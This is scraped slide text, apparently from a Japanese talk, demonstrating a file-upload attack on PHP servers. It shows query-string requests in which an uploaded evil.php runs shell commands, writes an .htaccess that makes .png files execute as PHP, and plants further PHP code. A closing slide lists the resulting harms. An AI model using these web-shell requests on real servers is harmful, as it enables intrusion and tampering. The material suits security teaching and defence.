Mais conteúdo relacionado
Semelhante a Demonstration of Executable File Upload Attack (20)
Demonstration of Executable File Upload Attack
- 7. Copyright © 2843 all rights reserved.
evil.php?1=shell_exec&2=echo%20AddHandler%20application/x-
httpd-php%20.png%20>%20.htaccess;mv%20evil.php%20evil.png;
evil.php
- 8. Copyright © 2843 all rights reserved.
• PHPファイルを画像ファイルへリネーム
• .htaccess作成
AddHandler application/x-httpd-php .png
.htaccess
evil.png
- 9. Copyright © 2843 all rights reserved.
.htaccess
evil.png
evil.png?1=shell_exec&
2=echo%20"<?php%20phpinfo();%20?>"%20>%20hoge.png
- 10. Copyright © 2843 all rights reserved.
.htaccess
evil.png
<?php phpinfo(); ?>
hoge.png
- 12. Copyright © 2843 all rights reserved.
• 情報漏洩
• ファイル改竄
• 他サーバへの攻撃
• マルウェア感染
• 任意のスクリプトの実行
- 13. Copyright © 2843 all rights reserved.
Thank you for your attention.
ohtsuki2843
ohtsuki2843